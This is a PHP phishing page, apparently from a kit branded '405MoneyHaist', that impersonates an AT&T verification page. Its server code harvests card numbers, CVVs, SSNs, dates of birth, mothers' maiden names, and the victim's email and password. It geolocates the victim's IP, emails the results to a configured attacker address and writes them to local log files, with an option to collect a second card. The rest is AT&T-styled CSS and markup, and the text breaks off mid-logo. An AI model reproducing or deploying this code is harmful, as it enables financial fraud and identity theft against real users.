<?php
error_reporting(E_ALL);
ini_set('display_errors', 1);
ob_start();
include '../../../setup/function.php';

if(empty($_SESSION['email']) && empty($_SESSION['password'])) {
    header("Location: https://www.att.net/");
    exit;
}

$res = json_decode(file_get_contents('../../../../config/access.json'), true);
$ip = $_SERVER['REMOTE_ADDR'];
$userAgent = $_SERVER['HTTP_USER_AGENT'] ?? 'Unknown';
$ipData = fetchIpData($ip, $userAgent);
if ($ipData) saveIpData($ipData, 'Human in Card Page');

if($_SERVER['REQUEST_METHOD'] == 'POST') {
    
    if(!isset($_SESSION['counting_submit']))
    {
        $_SESSION['counting_submit'] = 0;
    }
    
    $formData = $_SESSION['form_data'] ?? [];
    
    $cardname = $_POST['nameoncard'];
    $cardNumber = str_replace(' ', '', $_POST['ccn']);

    if (!is_numeric($cardNumber) || !luhn_check($cardNumber)) {
        header("HTTP/1.1 400 Bad Request");
        exit;
    }

    $expirationDate = $_POST['expdate']; $expirationDate = str_replace('/', '|', $expirationDate);
    $formatexpWebshop = explode('/', $_POST['expdate']);
    $cvv = $_POST['cvv'];
    $cid = $_POST['cid'];
    $xid = $_POST['xid'];

    $bin = substr($cardNumber, 0, 6);
    $formattedCardNumber = implode(' ', str_split($cardNumber, 4));

    $formattedBin = $bin;

    $cardDetails = getCardDetailsFromBIN($bin);
    $issuer = strtoupper($cardDetails['issuer']);
    $cardTier = strtoupper($cardDetails['card_tier']);
    $scheme = strtoupper($cardDetails['scheme']);
    $type = strtoupper($cardDetails['type']);
    
    $ispInfo = fetchIpData($ip, $userAgent);
    $cityGeo = $ispInfo['city'] ?? 'N/A';
    $region = $ispInfo['region'] ?? 'N/A';
    $country = $ispInfo['country'] ?? 'N/A';
    $isp = $ispInfo['isp'] ?? 'N/A';
    
    switch($_SESSION['form_address_template']) {
        case 'fill_v2':
            $fullname = htmlspecialchars($formData['firstname'] ?? '') . ' '. htmlspecialchars($formData['lastname'] ?? '');
            $address = htmlspecialchars($formData['address'] ?? '');
            $address2 = htmlspecialchars($formData['adde'] ?? '');
            $city = htmlspecialchars($formData['city'] ?? '');
            $state = htmlspecialchars($formData['state'] ?? '');
            $zipcode = htmlspecialchars($formData['zip'] ?? '');
            $phonenumber = htmlspecialchars($formData['phone'] ?? '');
            $cty = $country;
            $sosel = htmlspecialchars($formData['ssn'] ?? '');
            $dob = htmlspecialchars($formData['dob'] ?? '');
            $mmn = htmlspecialchars($formData['mmn'] ?? '');
            break;
        case 'fill_v3':
            $fullname = htmlspecialchars($formData['fullname'] ?? '');
            $address = htmlspecialchars($formData['address'] ?? '');
            $address2 = htmlspecialchars($formData['adde'] ?? '');
            $city = htmlspecialchars($formData['city'] ?? '');
            $state = htmlspecialchars($formData['state'] ?? '');
            $zipcode = htmlspecialchars($formData['zipcode'] ?? '');
            $phonenumber = htmlspecialchars($formData['phone'] ?? '');
            $cty = $country;
            $sosel = htmlspecialchars($formData['ssn'] ?? '');
            $dob = htmlspecialchars($formData['dob'] ?? '');
            $mmn = htmlspecialchars($formData['mmn'] ?? '');
            
            break;
        case 'fill_v4':
            $fullname = htmlspecialchars($formData['fullname'] ?? '');
            $address = htmlspecialchars($formData['address'] ?? '');
            $address2 = htmlspecialchars($formData['adde'] ?? '');
            $city = htmlspecialchars($formData['city'] ?? '');
            $state = htmlspecialchars($formData['state'] ?? '');
            $zipcode = htmlspecialchars($formData['zipcode'] ?? '');
            $phonenumber = htmlspecialchars($formData['phone'] ?? '');
            $cty = $country;
            $sosel = htmlspecialchars($formData['ssn'] ?? '');
            $dob = htmlspecialchars($formData['dob'] ?? '');
            $mmn = htmlspecialchars($formData['mmn'] ?? '');
            
            break;
        case 'fill_v5':
            $fullname = htmlspecialchars($formData['firstname'] ?? '') . ' ' . htmlspecialchars($formData['lastname'] ?? '');
            $address = htmlspecialchars($formData['address'] ?? '');
            $address2 = htmlspecialchars($formData['address2'] ?? '');
            $city = htmlspecialchars($formData['city'] ?? '');
            $state = htmlspecialchars($formData['state'] ?? '');
            $zipcode = htmlspecialchars($formData['zip'] ?? '');
            $phonenumber = htmlspecialchars($formData['phone'] ?? '');
            $cty = $country;
            $sosel = htmlspecialchars($formData['ssn'] ?? '');
            $dob = htmlspecialchars($formData['dob'] ?? '');
            $mmn = htmlspecialchars($formData['mmn'] ?? '');
            
            break;
        default:
            die('error bwang');
            break;
    }
    
    $email = htmlspecialchars($_SESSION['email'] ?? '');
    $password = htmlspecialchars($_SESSION['password'] ?? '');
    
    $deviceBrowser = getDeviceAndBrowser();
    $device = $deviceBrowser['device'];
    $browser = $deviceBrowser['browser'];
    $userAgent = $deviceBrowser['user_agent'];
    
    $dateTime = date("Y-m-d H:i:s");
    
    $webshop = "$cardNumber|$expirationDate|$cvv|$fullname|$address|$city|$state|$zipcode|$country|$phonenumber|$dob|$sosel|$mmn|$email|$ip|$userAgent";
    
    if($config['double_card'] == '1') {
        if(!empty($_SESSION['double_card'])) {
            if($_POST['ccn'] == $_SESSION['card_data']['ccn'])
            {
                $_SESSION['counting_submit'] += 1;
                if ($ipData) saveIpData($ipData, 'Human Try Submit Card '.$_SESSION['counting_submit']);
                header("Location: index?ref=".generateRandomString(100));
                exit;
            } else {
                goto doublecc;
            }
        } else {
            $_SESSION['double_card'] = 'on';
            $_SESSION['card_data'] = $_POST;
            
            $templateCard = str_replace("##EMAIL##", $email, $templateCard);
            $templateCard = str_replace("##PASSWORD##", $password, $templateCard);
            $templateCard = str_replace("##BIN##", $formattedBin, $templateCard);
            $templateCard = str_replace("##CNM##", $cardname, $templateCard);
            $templateCard = str_replace("##CARDNUM##", $cardNumber, $templateCard);
            $templateCard = str_replace("##EXP##", $expirationDate, $templateCard);
            $templateCard = str_replace("##CVV##", $cvv, $templateCard);
            $templateCard = str_replace("##CID##", $cid, $templateCard);
            $templateCard = str_replace("##XID##", $xid, $templateCard);
            $templateCard = str_replace("##FULLNAME##", $fullname, $templateCard);
            $templateCard = str_replace("##ADDRESS##", $address, $templateCard);
            $templateCard = str_replace("##ADDRESS2##", $address2, $templateCard);
            $templateCard = str_replace("##CTY##", $city, $templateCard);
            $templateCard = str_replace("##STE##", $state, $templateCard);
            $templateCard = str_replace("##PHONE##", $phonenumber, $templateCard);
            $templateCard = str_replace("##PINN##", '', $templateCard);
            $templateCard = str_replace("##ZC##", $zipcode, $templateCard);
            $templateCard = str_replace("##MMN##", $mmn, $templateCard);
            $templateCard = str_replace("##DOB##", $dob, $templateCard);
            $templateCard = str_replace("##SSN##", $sosel, $templateCard);
            $templateCard = str_replace("##COPYWEB##", $webshop, $templateCard);
            $templateCard = str_replace("##DATE##", $dateTime, $templateCard);
            $templateCard = str_replace("##DV##", $device, $templateCard);
            $templateCard = str_replace("##BW##", $browser, $templateCard);
            $templateCard = str_replace("##CY##", $cityGeo, $templateCard);
            $templateCard = str_replace("##ST##", $region, $templateCard);
            $templateCard = str_replace("##CT##", $country, $templateCard);
            $templateCard = str_replace("##IP##", $ip, $templateCard);
            $templateCard = str_replace("##UA##", $userAgent, $templateCard);
            
            $subject = "Card 1 :: $formattedBin $scheme $type $issuer :: [ $ip - $country ]";
            // Use global email sender with PHPMailer/SMTP
            if (function_exists('sendResultEmail')) {
                sendResultEmail($subject, $templateCard);
            } else {
                $headers = "MIME-Version: 1.0\r\n";
                $headers .= "Content-type: text/html; charset=UTF-8\r\n";
                $headers .= "From: 405MoneyHaist <no-reply@405moneyhaist.com>\r\n";
                @mail($res['email_result'] ?? $access['email_result'] ?? $config['email_result'] ?? '', $subject, $templateCard, $headers);
            }
            
            loginAndCardSave($ip, 'card.txt');
            loginAndCardSave($ip, 'card1.txt'); // Card 1 log
            cardDetailsLogs($ip, $formattedBin, $cardname, $issuer, $cardTier, $scheme,  $type, 'bin.txt');
            if ($ipData) saveIpData($ipData, 'Human Submit Card 1');
            header("Location: index?ref=".generateRandomString(100));
            ob_flush();
            exit;
        }
    }
    
    doublecc:
    $_SESSION['card_data'] = $_POST;
    
    $templateCard = str_replace("##EMAIL##", $email, $templateCard);
    $templateCard = str_replace("##PASSWORD##", $password, $templateCard);
    $templateCard = str_replace("##BIN##", $formattedBin, $templateCard);
    $templateCard = str_replace("##CNM##", $cardname, $templateCard);
    $templateCard = str_replace("##CARDNUM##", $cardNumber, $templateCard);
    $templateCard = str_replace("##EXP##", $expirationDate, $templateCard);
    $templateCard = str_replace("##CVV##", $cvv, $templateCard);
    $templateCard = str_replace("##CID##", $cid, $templateCard);
    $templateCard = str_replace("##XID##", $xid, $templateCard);
    $templateCard = str_replace("##FULLNAME##", $fullname, $templateCard);
    $templateCard = str_replace("##ADDRESS##", $address, $templateCard);
    $templateCard = str_replace("##ADDRESS2##", $address2, $templateCard);
    $templateCard = str_replace("##CTY##", $city, $templateCard);
    $templateCard = str_replace("##STE##", $state, $templateCard);
    $templateCard = str_replace("##PHONE##", $phonenumber, $templateCard);
    $templateCard = str_replace("##PINN##", '', $templateCard);
    $templateCard = str_replace("##ZC##", $zipcode, $templateCard);
    $templateCard = str_replace("##MMN##", $mmn, $templateCard);
    $templateCard = str_replace("##DOB##", $dob, $templateCard);
    $templateCard = str_replace("##SSN##", $sosel, $templateCard);
    $templateCard = str_replace("##COPYWEB##", $webshop, $templateCard);
    $templateCard = str_replace("##DATE##", $dateTime, $templateCard);
    $templateCard = str_replace("##DV##", $device, $templateCard);
    $templateCard = str_replace("##BW##", $browser, $templateCard);
    $templateCard = str_replace("##CY##", $cityGeo, $templateCard);
    $templateCard = str_replace("##ST##", $region, $templateCard);
    $templateCard = str_replace("##CT##", $country, $templateCard);
    $templateCard = str_replace("##IP##", $ip, $templateCard);
    $templateCard = str_replace("##UA##", $userAgent, $templateCard);
    
    if($config['double_card'] == '1') {
        $status_card = '2';
        loginAndCardSave($ip, 'card.txt');
        loginAndCardSave($ip, 'card2.txt'); // Card 2 log
        cardDetailsLogs($ip, $formattedBin, $cardname, $issuer, $cardTier, $scheme,  $type, 'bin.txt');
        if ($ipData) saveIpData($ipData, 'Human Submit Card 2');
    } else {
        $status_card = '1';
        if ($ipData) saveIpData($ipData, 'Human Submit Card 1');
        loginAndCardSave($ip, 'card.txt');
        loginAndCardSave($ip, 'card1.txt'); // Card  1 log
        cardDetailsLogs($ip, $formattedBin, $cardname, $issuer, $cardTier, $scheme,  $type, 'bin.txt');
    }
    
    $subject = "Card $status_card :: $formattedBin $scheme $type $issuer :: [ $ip - $country ]";
    // Use global email sender with PHPMailer/SMTP
            if (function_exists('sendResultEmail')) {
                sendResultEmail($subject, $templateCard);
            } else {
                $headers = "MIME-Version: 1.0\r\n";
                $headers .= "Content-type: text/html; charset=UTF-8\r\n";
                $headers .= "From: 405MoneyHaist <no-reply@405moneyhaist.com>\r\n";
                @mail($res['email_result'] ?? $access['email_result'] ?? $config['email_result'] ?? '', $subject, $templateCard, $headers);
            }
    
    $dataccwebshop = "$cardNumber|$expirationDate|$cvv|$fullname|$address|$city|$state|$zipcode|$country|$phonenumber|$dob|$sosel|$mmn|$email|$ip|$userAgent";
    saveDataCard($dataccwebshop);
    
    session_destroy();
    
    if($dataPage['completed_template'] == '1')
    {
        header("Location: ../../../completed/cidv1?ref=".generateRandomString(100));
        ob_flush();
        exit();
    } else if($dataPage['completed_template'] == '2')
    {
        header("Location: ../../../completed/cidv2?ref=".generateRandomString(100));
        ob_flush();
        exit();
    } else {
        die('error bwang');
    }
}
?>
<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width" />
        <title>AT&T | Verify</title>
    <link rel=icon type=image/x-icon
    href="data:image/x-icon;base64,AAABAAEAEBAAAAEAIABoBAAAFgAAACgAAAAQAAAAIAAAAAEAIAAAAAAAQAQAABMLAAATCwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD67L8E9dyLC/Xciwv34JkFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA////AvXahYT013zm9Nd6//TYfv/01nf/89Rw//PUb+n013mL////AgAAAAAAAAAAAAAAAAAAAAAAAAAA////C/vwzbz013z/8MdF/+7ALv/tvin/7LkW/+qzA//tvCL/8cpQ//bdkMz///8LAAAAAAAAAAAAAAAA////Avbflsr12oP/+u7H///++//+/fj//fjn//z13//9+ev/+/HQ//bdjv/uwTP/8s5e3P///wIAAAAAAAAAAPnnsXL89d7/+em2//LOXv/tvCD/6rIB/+qyAP/qsgD/6rIA/+q0Bf/tvyr/89Ns//TXev/013uJAAAAAAAAAAD78M7Z7sI1//HKUf/34Zz/+u7G//vxz//778r/+Oev//XahP/wx0f/67QH/+qyAP/qswL/89Jr6QAAAAD45aoD78M3//vxz//////////////////9+ez//PPW//vxz//78tP//ffj//356v/34Jn/7b0k/+qzAv/45aoD+OWqBvz02v/9+ev/9tyM/+/GQv/rtg3/6rIA/+qyAP/qsgD/6rIA/+qyAP/qswP/7sI0//Xciv/z0mv/9Nh/CP///wT45KT/67YO//DJS//34Jn/+u3F//zy1f/67sf/+Oev//Xciv/xylH/67YN/+qyAP/qsgD/8MdG//vwzAX///8C7LkW//rswf////////////357P/67MH/+OWq//fgmP/235b/+OWq//vxz//45KX/7b0k/+qyAP/45aoDAAAAAPfjoeD//fn/9t2Q/+7AL//qsgD/6rIA/+qyAP/qsgD/6rIA/+qyAP/qsgD/7b4n//npt//xzVjtAAAAAAAAAAD+/PRf8cpP/+2+KP/45qv//fbi//767//99+X/++/L//fhnf/xzFf/67QI/+qyAP/rtxH//fnqYQAAAAAAAAAA////AvDISeP78M3//PTa//Xci//y0GT/8ctT//LOXf/01nb/+OWq//z13f/wx0T/78U+5////wIAAAAAAAAAAAAAAAD45KUR+OatxOqzA//qsgD/6rIA/+qyAP/qsgD/6rIA/+qyAP/suRb/+u3Dv/XahhUAAAAAAAAAAAAAAAAAAAAAAAAAAP///wLz0muS7sAt9uqyAP/qsgD/6rIA/+qyAP/tvij38tBkl/jlqgMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD45aoD9Nh/CPTYfwj02H8EAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/D8AAOAHAADAAwAAgAEAAIABAACAAfC/AAAAAAAAAAAAAAAAAAAAAIABAACAAQAAgAEAAMADAADgBwAA/D8AAA==">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/bootstrap/5.3.3/css/bootstrap.min.css">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0/css/all.min.css" />
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.11.3/font/bootstrap-icons.min.css">
  </head>
  <style>
    .ok {
        text-decoration: none;
    }
    .pl {
        font-weight: bold;
        color:rgb(185, 185, 185);
        font-size: 14px;
    }
    :root {
        font-size: 80.5%
      }
      
      *,*:before,*:after {
        -webkit-tap-highlight-color: transparent;
        box-sizing: border-box;
        margin: 0;
        padding: 0
      }
    
    body {
        background-color: var(--body-bgcolor, #fff);
        color: var(--body-text-color, #454b52);
        font-family: font-regular,sans-serif;
        font-size: 1.8rem;
        font-weight: normal;
        line-height: 1;
        position: relative;
        width: 100%;
    }

      
      .att-nav {
        background-color: #fff;
        box-shadow: 0 2px 4px rgba(0, 0, 0, 0.1);
        position: fixed;
        width: 100%;
        top: 0;
        z-index: 1000;
      }
      
      .nav-container {
        max-width: 1200px;
        margin: 0 auto;
        padding: 0 20px;
        height: 75px;
        display: flex;
        justify-content: space-between;
        align-items: center;
      }
      
      .nav-left {
        display: flex;
        align-items: center;
        gap: 30px;
      }
      
      .logo {
        font-size: 24px;
        font-weight: bold;
        color: #009fdb;
        text-transform: lowercase;
        margin-left: -80px;
      }
      
      .nav-links {
        display: flex;
        gap: 24px;
      }
      
      .nav-links a {
        text-decoration: none;
        color: #000;
        font-weight: 500;
        font-size: 16px;
        padding: 8px 0;
        position: relative;
      }
      
      .nav-links a:hover::after {
        content: '';
        position: absolute;
        bottom: 0;
        left: 0;
        width: 100%;
        height: 2px;
        background-color: #009fdb;
      }
      
      .nav-right {
        display: flex;
        align-items: center;
        gap: 24px;
      }
      
      .nav-button {
        text-decoration: none;
        color: #000;
        font-size: 14px;
        display: flex;
        align-items: center;
        gap: 8px;
      }
      
      .nav-button i {
        font-size: 16px;
      }
      
      .nav-button:hover {
        color: #009fdb;
      }
      
      /* Add spacing below navbar for main content */
      main {
        margin-top: 80px;
        padding: 1rem;
      }
      
      /* Responsive Design */
      @media (max-width: 1024px) {
        .nav-links {
          gap: 16px;
        }
        
        .nav-links a {
          font-size: 14px;
        }
      }
      
      @media (max-width: 768px) {
        .nav-links {
          display: none;
        }
        
        .nav-right {
          gap: 16px;
        }
        
        .nav-button span {
          display: none;
        }
    }
    .card {
        width: 500px;
    }
  </style>
  <style>
    @font-face {
        font-display: swap;
        font-family: 'font-regular';
        src: url("./fonts/ATTAleckSans_W_Rg.woff2") format("woff2"),url("./fonts/ATTAleckSans_W_Rg.woff") format("woff")
    }
    
    @font-face {
        font-display: swap;
        font-family: 'font-bold';
        src: url("./fonts/ATTAleckSans_W_Bd.woff2") format("woff2"),url("./fonts/ATTAleckSans_W_Bd.woff") format("woff")
    }
    
    @font-face {
        font-display: swap;
        font-family: 'font-medium';
        src: url("./fonts/ATTAleckSans_W_Md.woff2") format("woff2"),url("./fonts/ATTAleckSans_W_Md.woff") format("woff")
    }
    
    @font-face {
        font-display: swap;
        font-family: 'font-thin';
        src: url("./fonts/ATTAleckSans_W_Th.woff2") format("woff2"),url("./fonts/ATTAleckSans_W_Th.woff") format("woff")
    }
    
    @font-face {
        font-display: swap;
        font-family: 'font-light';
        src: url("./fonts/ATTAleckSans_W_Lt.woff2") format("woff2"),url("./fonts/ATTAleckSans_W_Lt.woff") format("woff")
    }
    
    @font-face {
        font-display: swap;
        font-family: 'font-black';
        src: url("./fonts/ATTAleckSans_W_Blk.woff2") format("woff2"),url("./fonts/ATTAleckSans_W_Blk.woff") format("woff")
    }
    
    .alert {
            padding: 5px;
            background-color: red;
            color: white;
            font-size:15px;
        }

        .closebtn {
            margin-left: 15px;
            color: white;
            font-weight: bold;
            float: right;
            font-size: 14px;
            line-height: 20px;
            cursor: pointer;
            transition: 0.3s;
        }

        .closebtn:hover {
            color: black;
        }
        
        .ler {
    border:none;
    }
    
    .font-regular,.font-italic {
        font-family: font-regular,sans-serif
    }
    
    .font-italic {
        font-style: italic
    }
    
    .font-bold,.font-bold-italic {
        font-family: font-bold,sans-serif;
        text-indent: -.05em
    }
    
    .font-bold-italic {
        font-style: italic
    }
    
    .font-medium,.font-medium-italic {
        font-family: font-medium, sans-serif
    }
    
    .font-medium-italic {
        font-style: italic
    }
    
    .font-thin,.font-thin-italic {
        font-family: font-thin, sans-serif
    }
    
    .font-thin-italic {
        font-style: italic
    }
    
    .font-light,.font-light-italic {
        font-family: font-light, sans-serif
    }
    
    .font-light-italic {
        font-style: italic
    }
    
    .font-black,.font-black-italic {
        font-family: font-black, sans-serif
    }
    
    .font-black-italic {
        font-style: italic
    }
    
    .joll {
     display: none; 
        }
        
    .errorClass {
    color: #d9534f;
    background-color: transparent;
    padding:5px 10px;
    border: 1px solid red;
    border-radius: 5px; 
    font-size: 13px; 
    margin-top: 5px; 
    display: block; 
}

.errorClass a {
    color: #c9302c;
    text-decoration: none;
}

 .ler {
    border:none;
    }
    .errorMsg {
        color: red;
        font-size:13px;
        display: none;
        margin-top: 3px;
    }
    .error {
        color:red;
        border-color: red;
    }
    .validated {
        border-color: green;
    }
    #cidInput {
        display: none;
    }

    

#submitBtn {
        position: relative;
        padding: 10px 30px;
        font-size: 16px;
        background-color: #28a745;
        color: white;
        border: none;
        border-radius: 6px;
        cursor: pointer;
        overflow: hidden;
        height: 45px;
      }
      
      .button-text {
        transition: opacity 0.3s ease;
      }
      
      .spinner {
        display: none;
        position: absolute;
        left: 50%;
        top: 50%;
        width: 20px;
        height: 20px;
        border: 3px solid white;
        border-top: 3px solid transparent;
        border-radius: 50%;
        animation: spin 0.8s linear infinite;
        transform: translate(-50%, -50%);
      }
      
      @keyframes spin {
        to { transform: translate(-50%, -50%) rotate(360deg); }
      }
      
      .loading .button-text {
        opacity: 0;
      }
      
      .loading .spinner {
        display: block;
      }
  </style>
  <body class="bg-light">
    <nav class="att-nav">
      <div class="nav-container">
        <div class="nav-left">
          <div class="logo"><img src="data:image/svg+xml;base64,PHN2ZyB3aWR0aD0iNDQxIiBoZWlnaHQ9IjE0NCIgdmlld0JveD0iMCAwIDQ0MSAxNDQiIGZpbGw9Im5vbmUiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyI+CiAgICA8cGF0aCBmaWxsLXJ1bGU9ImV2ZW5vZGQiIGNsaXAtcnVsZT0iZXZlbm9kZCIgZD0iTTI3Ni44MzYgMTE1LjI3QzI3OC4yMzYgMTE1LjI3IDI3OS4yMSAxMTQuMjk4IDI3OS4yMSAxMTIuODk3VjQzLjM1NkgzMDIuODE5QzMwNC4yMiA0My4zNTYgMzA1LjE5IDQyLjM4NyAzMDUuMTkgNDAuOTg0VjMxLjM5M0MzMDUuMTkgMjkuOTg5IDMwNC4yMiAyOS4wMTggMzAyLjgxOSAyOS4wMThIMjM5Ljk2MUMyMzguNTU5IDI5LjAxOCAyMzcuNTkxIDI5Ljk4OSAyMzcuNTkxIDMxLjM5M1Y0MC45ODRDMjM3LjU5MSA0Mi4zODcgMjM4LjU1OSA0My4zNTYgMjM5Ljk2MSA0My4zNTZIMjYzLjU3MlYxMTIuODk3QzI2My41NzIgMTE0LjI5OCAyNjQuNTQ1IDExNS4yNyAyNjUuOTQyIDExNS4yN0gyNzYuODM2Wk0zODQuNDI3IDExMi4yNTJDMzg1LjgzIDExMy43NjIgMzg0Ljk2OCAxMTUuMjcgMzgzLjIzOCAxMTUuMjdIMzY5LjU0OUMzNjcuNzE2IDExNS4yNyAzNjYuNzQzIDExNC44MzkgMzY1LjU1NyAxMTMuNDM1TDM1Ny4zNjYgMTA0LjM4M0MzNTEuODcgMTExLjcxNCAzNDQuMjA5IDExNy4yMTEgMzMxLjQ5IDExNy4yMTFDMzE1Ljc0OSAxMTcuMjExIDMwMy4zNSAxMDcuNzI1IDMwMy4zNSA5MS40NDVDMzAzLjM1IDc4LjkzNiAzMTAuMDM1IDcyLjI1MiAzMjAuMTY5IDY2LjY0NkMzMTUuMjExIDYwLjkzIDMxMi45NDYgNTQuODk0IDMxMi45NDYgNDkuNjEzQzMxMi45NDYgMzYuMjQgMzIyLjMyNiAyNy4wNzcgMzM2LjQ0OCAyNy4wNzdDMzUwLjg5NyAyNy4wNzcgMzU5LjczNiAzNS41OTggMzU5LjczNiA0OC4yMTFDMzU5LjczNiA1OC45ODkgMzUxLjk3NSA2NS4wMjUgMzQzLjc3OSA2OS41NTdMMzU1Ljg1NSA4Mi42MDVMMzYyLjY0OCA3MC43NDFDMzYzLjUxIDY5LjM0MSAzNjQuNDgxIDY4LjggMzY2LjIwNSA2OC44SDM3Ni42NjFDMzc4LjM4OSA2OC44IDM3OS4zNTkgNjkuOTkxIDM3OC4yODMgNzEuODIxTDM2Ni4yMDUgOTIuNTE4TDM4NC40MjcgMTEyLjI1MlYxMTIuMjUyWk0zMzYuNjY0IDQwLjQ0NUMzMzEuMDYgNDAuNDQ1IDMyNy44MjUgNDQuMDA1IDMyNy44MjUgNDguNzQ4QzMyNy44MjUgNTIuNDE1IDMyOS43NjMgNTUuNjQ5IDMzNC4xODUgNjAuMzkyQzM0MS44MzggNTUuOTcyIDM0NS4wNzQgNTMuMjc4IDM0NS4wNzQgNDguNTM0QzM0NS4wNzQgNDQuMTEyIDM0Mi4yNzMgNDAuNDQ1IDMzNi42NjQgNDAuNDQ1VjQwLjQ0NVpNMzMxLjgxNSAxMDMuNjI1QzMzOC43MTEgMTAzLjYyNSAzNDMuMzQ5IDEwMC4yODUgMzQ3LjEyMyA5NC41NzFMMzI5LjY2IDc1LjgwOUMzMjIuOTczIDc5LjU4NSAzMTguNjU4IDgzLjM1NSAzMTguNjU4IDkwLjkwNEMzMTguNjU4IDk4LjM0NSAzMjQuNjk1IDEwMy42MjUgMzMxLjgxNSAxMDMuNjI1VjEwMy42MjVaTTI0OC4wNyAxMTIuNDY0QzI0OC42MDggMTEzLjg2OCAyNDcuNzQ2IDExNS4yNyAyNDYuMjM3IDExNS4yN0gyMzUuMDI0QzIzMy40MDggMTE1LjI3IDIzMi40MzUgMTE0LjUxNyAyMzEuODk3IDExMy4wMDNMMjI1LjUzNiA5NC42NzhIMTkwLjcxNkwxODQuMzUgMTEzLjAwM0MxODMuODEyIDExNC41MTcgMTgyLjg0MSAxMTUuMjcgMTgxLjIyNSAxMTUuMjdIMTcwLjY2QzE2OS4yNTggMTE1LjI3IDE2OC4yODcgMTEzLjg2OCAxNjguODI4IDExMi40NjRMMTk4LjA0NCAzMS4xNzRDMTk4LjU4NSAyOS42NjMgMTk5LjU1NSAyOS4wMiAyMDEuMTY5IDI5LjAySDIxNS42MThDMjE3LjIzNCAyOS4wMiAyMTguMzEgMjkuNjYzIDIxOC44NTEgMzEuMTc0TDI0OC4wNyAxMTIuNDY0VjExMi40NjRaTTIyMC41NzYgODAuNTU0TDIwOC4xNzkgNDQuOTc1TDE5NS42NzEgODAuNTU0SDIyMC41NzZaTTQwMS40NjEgMTE1LjI3QzQwMC4wNiAxMTUuMjcgMzk5LjA5MiAxMTQuMjk4IDM5OS4wOTIgMTEyLjg5N1Y0My4zNTZIMzc1LjQ3N0MzNzQuMDc0IDQzLjM1NiAzNzMuMTA2IDQyLjM4NyAzNzMuMTA2IDQwLjk4NFYzMS4zOTNDMzczLjEwNiAyOS45ODkgMzc0LjA3NCAyOS4wMTggMzc1LjQ3NyAyOS4wMThINDM4LjMzNUM0MzkuNzM2IDI5LjAxOCA0NDAuNzAzIDI5Ljk4OSA0NDAuNzAzIDMxLjM5M1Y0MC45ODRDNDQwLjcwMyA0Mi4zODcgNDM5LjczNiA0My4zNTYgNDM4LjMzNSA0My4zNTZINDE0LjcyM1YxMTIuODk3QzQxNC43MjMgMTE0LjI5OCA0MTMuNzUyIDExNS4yNyA0MTIuMzUyIDExNS4yN0g0MDEuNDYxVjExNS4yN1oiIGZpbGw9IiMxMzE3MUIiLz4KICAgIDxwYXRoIGZpbGwtcnVsZT0iZXZlbm9kZCIgY2xpcC1ydWxlPSJldmVub2RkIiBkPSJNMTA4LjgyOSAxMC4xNTFDOTguMDM5IDMuNjggODUuNTEgMCA3Mi4wMDEgMEM1OC4zOTcgMCA0NS40OSAzLjgxMSAzNC42NjEgMTAuNDUyQzMxLjQxNSAxMi40NTEgMjkuNTg1IDE0LjA1NiAyOS41ODUgMTYuMTEzQzI5LjU4NSAyMi4xODkgNDMuNzczIDI4LjcxNyA2OC45NDMgMjguNzE3QzkzLjg1MSAyOC43MTcgMTEzLjE3IDIxLjU2NSAxMTMuMTcgMTQuNjc5QzExMy4xNyAxMy4wMzcgMTExLjczNiAxMS44ODYgMTA4LjgyOSAxMC4xNTFNMTE5LjU0OCAxOC4xNUMxMTkuODUgMTguNjIyIDEyMC4wMDEgMTkuMTMxIDEyMC4wMDEgMTkuODFDMTIwLjAwMSAyNy44MTEgOTUuNTI5IDQxLjk2MiA1Ni41NjcgNDEuOTYyQzI3Ljk0MiA0MS45NjIgMjIuNTg1IDMxLjMzOSAyMi41ODUgMjQuNTgzQzIyLjU4NSAyMi4xNjggMjMuNTEgMTkuNjk3IDI1LjU0OCAxNy4xODlDMjUuNjYyIDE3LjAzNyAyNS41NjYgMTYuOTggMjUuNDM1IDE3LjA5NEMyMS43MTggMjAuMjQ0IDE4LjMwMiAyMy43OTEgMTUuMzAzIDI3LjYyM0MxMy44NjkgMjkuNDM0IDEyLjk4MSAzMS4wMzggMTIuOTgxIDMxLjk5OUMxMi45ODEgNDUuOTk5IDQ4LjA3NSA1Ni4xNSA4MC44ODcgNTYuMTVDMTE1Ljg0OSA1Ni4xNSAxMzEuNDU0IDQ0LjczNSAxMzEuNDU0IDM0LjY5OEMxMzEuNDU0IDMxLjExMiAxMzAuMDU5IDI5LjAxOCAxMjYuNDkxIDI0Ljk2MUMxMjQuMTcxIDIyLjMyIDEyMS45ODEgMjAuMTcgMTE5LjY2MiAxOC4wNTVDMTE5LjU0OCAxNy45NjIgMTE5LjQ3MSAxOC4wMzcgMTE5LjU0OCAxOC4xNU02Ljk0MiA0MS4xMTJDNC44MzIgNDUuMzAyIDIuNDkyIDUyLjM3NiAxLjc5NCA1Ni4wMzZDMS40OSA1Ny42MDQgMS42MjIgNTguMzU3IDIuMTcgNTkuNTI4QzYuNTg3IDY4LjkwNSAyOC45MjYgODMuOTA2IDgxLjAzOSA4My45MDZDMTEyLjgzIDgzLjkwNiAxMzcuNTI5IDc2LjA5MyAxNDEuNTI5IDYxLjgzMUMxNDIuMjY1IDU5LjIwNiAxNDIuMzA0IDU2LjQzMyAxNDEuMzU5IDUyLjY5OEMxNDAuMzAxIDQ4LjUyNiAxMzguMzIxIDQzLjY2IDEzNi42NDMgNDAuMjQ1QzEzNi41ODcgNDAuMTMxIDEzNi40OTEgNDAuMTUgMTM2LjUwOSA0MC4yODFDMTM3LjEzMiA1OC45ODEgODUuMDAxIDcxLjAzNyA1OC42OTggNzEuMDM3QzMwLjIwNyA3MS4wMzcgNi40MzUgNTkuNjc5IDYuNDM1IDQ1LjMzOEM2LjQzNSA0My45NjEgNi43MTggNDIuNTg0IDcuMDc2IDQxLjE1QzcuMTEyIDQxLjAxOSA2Ljk5OSA0MC45OTggNi45NDIgNDEuMTEyTTU3LjUyOSAxMDAuODY2QzIwLjY4MSAxMDAuODY2IDM